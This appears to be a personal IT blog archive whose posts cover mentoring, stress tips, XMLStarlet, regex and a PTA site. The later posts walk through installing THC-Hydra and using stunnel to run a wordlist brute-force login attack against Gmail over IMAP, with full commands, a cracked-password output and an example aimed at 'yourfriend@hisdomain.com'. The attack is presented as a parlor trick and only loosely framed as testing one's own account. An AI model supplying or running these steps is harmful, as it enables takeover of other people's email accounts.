It’s amazing to me how many veteran IT gurus are unwilling to teach people new to the industry. I remember logging onto IRC chat rooms and seeing one person after another being degraded or insulted for asking valid legitimate questions. I was shocked to find that this was NOT the norm in the amateur (ham) radio hobby. In amateur radio culture, an Elmer is a person who teaches and nurtures the neophyte amateur radio operator. We NEED Elmers in IT.

I understand that there is a big difference between a “hobby” and an actual business profession. I also understand that some of these IT veterans see their job as just that, a job. For me, it is not just a job, my job IS MY HOBBY. Imagine that, a job that is so enjoyable that you actually WANT to do it. I feel that those who feel like me are the same people who are not opposed to teaching a newbie to my “hobby”.

So what can we do for these individuals who are not thrilled to be in the trenches with us? I tend to agree with books like Drive and the Strength Finder series; we need to let everyone do what they love. Telling a “it’s just a job” individual to teach a neophyte can be very challenging. The goal becomes finding what part of the “job” this individual actually enjoys. It will take some detective work to find the answer but with enough prodding you can find some passion in this individual. Please note, this will not always be a tech related skill. I had one individual who REALLY loved PowerPoint. Let me tell you, the 1 hour presentation this person gave was amazing. He was extremely well versed and even PowerPoint haters were upping their presentations after that presentation.

I think setting up a regularly scheduled teach a topic session can have many benefits for any IT department. It gives individuals a forum to talk about what they like, gives management an inexpensive training resource and helps enhance the skill of those attending. I recommend it as a topic of conversation at your next team meeting.

Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime. –Chinese Proverb

Working in IT can be stressful. Many technologists go unappreciated and are only noticed when something is not to the user’s liking. This creates a feeling of being undervalued. What can you do? Here is a small list of tasks that may help.

1. Create a daily log where you write at least ONE way you contributed to the success of the company. This is great for review time. It’s OK to repeat on several tasks since you can mention examples like “restored accidentally deleted files 60 times this year”.
2. Have a GREAT task list. This will work for this “what are you doing all day” questions? I recommend a ticket system like RT or some other type of sharable task list. My recommendation would be to read up on Thomas Limoncelli’s system in his book “Time Management for System Administrators“. It’s a must have for any tech trying to organize their to-do list.
3. Schedule a daily outage. What? Yes, schedule a daily ONE Hour outage. Why? It WILL HAPPEN, might as well schedule for it. If there isn’t an outage, make sure you have some task that will benefit the organization (e.g. study for certification).
4. Create a PANIC ROOM. This is the place where all employees know NOT TO bother you. For me, its normally been the 65 degree server room with its loud fans. Make sure to get a NICE, comfy chair in there and a computer you can use as a client. The PANIC ROOM is not just a place to run to in an outage but it can also serve as a small getaway when humans get antsy and annoying.
5. Grab a notebook during an outage. Start writing about the issue at hand. If it doesn’t help you flesh out a solution it will at least give you a moment to breathe and analyze the situation at hand. You are able to think clearly if you are more at peace. Taking these few moments may actually help you solve the issue faster.
6. Create a backup team. Who has your back? I once had a manager who was great at pushing users away from me. Since then I have always explained to my managers that I may need to call upon them to begin a buffer between me and the disgruntled users. Users respond better to upper management but if you only have a peer as a buffer, that may work as well. You would be surprised how grateful your peers will be if you volunteer to be a buffer for them. They are amazingly cooperative when you are deep in the hole.

These are just some of the tips that have worked for me. My goal is always to take a step back, breathe and attack the issues systematically. Having a plan helps a lot and I recommend you take a minute to hash one out that works for you. If you do so, everyone will think that you are a “go with the flow” kind of guy.

The boy looked at the digital horizon. Squinting; not with his eyes but with his mind. He was trying to make sense of it all. It’s almost in focus but not enough to make sense of it all. “Why can’t I see it?” Take a step backwards; no that makes it blurry. Take two steps forward, worse still. “Dammit, what the hell…?” Work it out. “It’s because I’m a kid, isn’t it?” In 10 years, maybe he’ll get it. No, maybe 5 considering he is top of his class. Ah, whatever; give it two years, he’s a genius.

He blinks and holds it hoping that it will give him some fresh new insight. He slowly opens his eyes. CRAP! The code looks more obfuscated than before.

http://en.wikipedia.org/wiki/Obfuscation

UPDATE: 5.9.1 seems to work without the need to manually compile libssh. Simply replace the libssh part below with

sudo apt-get install libssh-dev

Also, grab 5.9.1 using

wget -c http://freeworld.thc.org/releases/hydra-5.9.1-src.tar.gz

Wikipedia describes THC-Hydra as “… software … that uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services.” Its useful for doing quick tests against your servers to make sure that your users are not using simple passwords. In pen tester speak, this is called a brute-force attack.

Here are the steps needed for installing it on the 32-bit version of Ubuntu 10.10 (Maverick Meerkat).

Make sure you have all the necessary development tools (i.e. libraries, compilers, headers) and the source files for GTK:

sudo apt-get install build-essential linux-headers-$(uname -r) libgtk2.0-dev libssl-dev cmake

Before we compile Hydra, we need to install libssh. For some odd reason, hydra does not like the libssh-dev package that comes with Ubuntu.

wget -c http://www.libssh.org/files/0.4/libssh-0.4.6.tar.gz
tar -xvzf libssh-0.4.6.tar.gz
cd libssh-0.4.6
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug ..
make
sudo make install
cd ../..

Download and extract the THC-Hydra tarball

wget -c http://edwincastillo.com/wp-content/uploads/2010/12/hydra-5.9-src.tar.gz
tar -xvzf hydra-5.9-src.tar.gz
cd hydra-5.9-src

Now you are ready to compile:

./configure
make
sudo make install

You are now ready to use Hydra. Type ./hydra -h to get syntax help. The GUI version can be started by running xhydra.

If you have a GMail account with IMAP enabled, you can use the following example to test hydra:

hydra -S -l email@gmail.com -p your_password -V imap.gmail.com imap

I believe that I am only at a beginning, only knocking at a door, and I believe that the best is yet to come. –Pat Buckley

This week I learned to use a command line XML Toolkit called XMLStarlet. It’s pretty easy to use considering I was trying to create the same process in Java using XOM.

I’m a bit familiar with SQL Select statements and wanted something similar to that. XMLStarlet can use XPath statements which aren’t as powerful as SQL queries but was sufficient for my needs. It was a bit of a stretch but an hour or so at w3schools.com and I figured out the queries I needed.

Besides the XPath expressions, the general syntax is pretty simple.

I used the sel command to initiate a query. My XML data came from a series of web queries so I used the --net global option which allowed me to fetch entities over network.

I wanted the output to be a CSV file, so I opted for the -T global option which changes the output to text. I simply added commas by using -o ,.

XPath and XML queries seem to work by selecting a set and than calling the value of an element. The selecting was done using the -m option for “match” and the -v option for “print value”.

Here is what my command line options looked like:

xml sel --net -T -N wp="http://api.whitepages.com/schema/" -t -m /wp:wp/wp:listings/wp:listing -v wp:displayname -o , -v child::wp:phonenumbers/child::wp:phone/child::wp:fullphone -o , -v child::wp:address/child::wp:fullstreet  -n http:\\api.whitepages.com\enter_api_query_here

I ended up using some of my Java code and XMLStarlet together to meet the needs of this project. My next task is to incorporate my new found knowledge of XPath into the Java code I wrote. Let’s see what I learn next.

This is my second year in my son’s school PTA and I decided to make more of an effort this year. I was happy to be elected the acting CIO of this small group and decided that they need their own website. Here is my contribution to my son’s education.
Spring Valley Elementary School PTA Website

I recently needed to retrieve Biblical texts out of a few paragraphs.

My original text was something like this:

(John 14:30; Luke 4:6) ... “the entire inhabited earth.” (Revelation 12:9)

I jumped over to my text-editor’s Search feature to see if I can find a way to do this. I noticed it had a Search mode setting of “Regular Expression”. I immediately thought of XKCD and said “Everybody stand back. I Know Regular Expressions!”

OK, so I really don’t know regular expressions but let me tell you how I figured it out.

There are a lot of online RegEx testing tools but I normally use RegExr simply because its one of the ones I first bookmarked and has samples with descriptions. Using the samples on the left of the screen, I was able to learn that matching the open parenthesis required that it be escaped.

\(

I also knew about the infamous .* which matches any number of characters. So I just added the closing parenthesis \) and thought that would be all.

\(.*\)

I was WRONG!! It worked well for any sentence that had one set of parenthesis, but not for those that had two like the example I showed above. It matched everything between the first open parenthesis and the last closed parenthesis.

OK, so like I said, I don’t know RegEx but I do know Google. I knew that the web is full of examples but I knew that not everyone would be looking to match parenthesis. So what is the most common character with text between it? Answer: Quotes!. After digging around, I found this page:
Regex Tutorial – The Dot Matches (Almost) Any Character
It help me understand why the dot was catching everything in between. I love the fact that they use the word “GREEDY” to describe this behavior.

To explain the solution using the websites terms, I did not want any number of any character between the parenthesis. What I really wanted was any number of characters that are not parenthesis or newlines between the parenthesis.

So, the corrected RegEx ended up being the following:

\([^\(\r\n]*\)

Users are still known to use simple passwords. If you need to help convince someone of the importance of strong passwords, you can use a brute force tool to demonstrate what a good password list can do.

The first brute-force tool I ever picked up was THC-Hydra which supports all kinds of protocols like HTTP, HTTPS, VNC and IMAP to name a few. GMail is very popular in my circle of friends. Brute forcing a GMail account tends to be a very impressive parlor trick. The only issue is that GMail actually uses SSL IMAP and Hydra only supports clear-text IMAP. The solution: stunnel. Stunnel will encrypt your TCP connection inside SSL. Stunnel takes care of the encryption and Hydra takes care of the IMAP login attempts.

Read on to see a step by step how-to on setting this up on Ubuntu LUcid Lynx 10.04.First, you need to compile THC-Hydra. Follow the instructions here.

Installing STUNNEL is a bit simpler.

sudo apt-get install stunnel

Edit /etc/default/stunnel4, change ENABLED=0 to ENABLED=1.

Edit the /etc/stunnel/stunnel.conf and set it up for client mode. The configuration for IMAP will accept connections on the standard IMAP TCP port “143″ and redirect the traffic to imap.gmail.com on the standard SSL IMAP port “993″.

Below is the stunnel.conf file I use.

; Sample stunnel configuration file by Michal Trojnara 2002-2009
; Some options used here may not be adequate for your particular configuration
; Please make sure you understand them (especially the effect of the chroot jail
)
 
; Certificate/key is needed in server mode and optional in client mode
;cert = /etc/ssl/certs/stunnel.pem
;key = /etc/ssl/certs/stunnel.pem
 
; Protocol version (all, SSLv2, SSLv3, TLSv1)
sslVersion = SSLv3
 
; Some security enhancements for UNIX systems - comment them out on Win32
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
; PID is created inside the chroot jail
pid = /stunnel4.pid
 
; Some performance tunings
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1
;compression = zlib
 
; Workaround for Eudora bug
;options = DONT_INSERT_EMPTY_FRAGMENTS
 
; Authentication stuff
;verify = 2
; Don't forget to c_rehash CApath
; CApath is located inside chroot jail
;CApath = /certs
; It's often easier to use CAfile
;CAfile = /etc/stunnel/certs.pem
; Don't forget to c_rehash CRLpath
; CRLpath is located inside chroot jail
;CRLpath = /crls
; Alternatively you can use CRLfile
;CRLfile = /etc/stunnel/crls.pem
 
; Some debugging stuff useful for troubleshooting
debug = 7
output = /var/log/stunnel4/stunnel.log
 
; Use it for client mode
client = yes
 
; Service-level configuration
 
;[pop3s]
;accept  = 995
;connect = 110
 
[imaps]
accept = 143
connect = imap.gmail.com:993
 
;[ssmtp]
;accept  = 465
;connect = 25
 
;[https]
;accept  = 443
;connect = 80
;TIMEOUTclose = 0
 
; vim:ft=dosini

Start up the stunnel daemon.

sudo /etc/init.d/stunnel4 start

You can verify that the IMAP port is listening on your local server.

netstat -an | grep -iw LISTEN

Look for the following line in the output:

tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN

Now, before you can brute-force your GMail account, you must enable IMAP. Log on to your GMail account and click on Settings > Forwarding and POP/IMAP. Locate the IMAP Access: section and select Enable IMAP. Click on the Save Changes button to complete this step.

Let’s pull out our 1970′s toolbox and use TELNET to test our STUNNEL configuration and our GMail access. We will telnet to localhost’s port 143. We should see the Gmail banner “* OK Gimap ready for requests from …”

telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK Gimap ready for requests from 5.5.5.5 c5if2789008nfi.67

Now that we are connected to the GMail IMAP server, we can test communication by using some IMAP commands like LOGIN. In the example below, change username@gmail.com to your GMail username, and change password to your actual password.

01 LOGIN username@gmail.com password
01 OK username@gmail.com authenticated (Success)

You are now successfully logged into your GMail account. Use the LOGOUT command to end the session.

02 LOGOUT
* BYE LOGOUT Requested
02 OK 73 good day (Success)
Connection closed by foreign host.

OK, now we know we have our set up ready to go. This is were we start using Hydra to brute-force its way into the GMail account.

To start you will need a text file with common passwords. This is known as a wordlist. You can google for lists or pick some up from here. For my demonstration, I have a small list that I normally use which you can grab here. For testing you can add your real password to the list.

Now you are ready to use Hydra. You can use the GUI version by running xhydra but I prefer the command line.

hydra -l username@gmail.com -P wordlist.txt -V localhost imap

The -V option will show the login and password combination for each attempt. Once it finds a match it will need to kill all the other attempts that it is running. At the end of your prompt you should see something like this:

[143][imap] host: 127.0.0.1   login: username@gmail.com   password: 12345678
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-08-24 14:12:59

Congratulations, you now have access to YOUR email. You can reward yourself by purchasing a t-shirt that publicizes your brand new conquest here.

Wikipedia describes THC-Hydra as “… software … that uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services.” Its useful for doing quick tests against your servers to make sure that your users are not using simple passwords. In pen tester speak, this is called a brute-force attack.

Here are the steps needed for installing it on the 32-bit version of Ubuntu Lucid Lynx 10.04.

Make sure you have all the necessary development tools (i.e. libraries, compilers, headers) and the source files for GTK:

sudo apt-get install build-essential linux-headers-$(uname -r) libgtk2.0-dev

Download and extract the THC-Hydra tarball

wget -c http://freeworld.thc.org/releases/hydra-5.7-src.tar.gz
tar -xvzf hydra-5.7-src.tar.gz
cd hydra-5.7-src

Now you are ready to compile:

./configure
make
sudo makeinstall

You are now ready to use Hydra. Type ./hydra -h to get syntax help. The GUI version can be started by running xhydra.

An example of using Hydra would look like this:

./hydra -l yourfriend@hisdomain.com -P password.txt -V mail.hisdomain.com imap

I believe that I am only at a beginning, only knocking at a door, and I believe that the best is yet to come. –Pat Buckley

OMG, Installing Metasploit on Ubuntu is SOOO easy now. I installed it all of 5 minutes by following the instructions at http://www.metasploit.com/redmine/projects/framework/wiki/Install_Linux.

Download the Linux 32-bit (x86) installer from the downloads page and run the following commands:

$ chmod +x framework-3.*-linux-i686.run
$ sudo ./framework-3.*-linux-i686.run

Once the installation process is complete, enter “hash -r” to reload your path. At this point all of the framework commands should be in the system path (via symlinks in /usr/local/bin), and the framework can be updated by running “msfupdate” as the root user.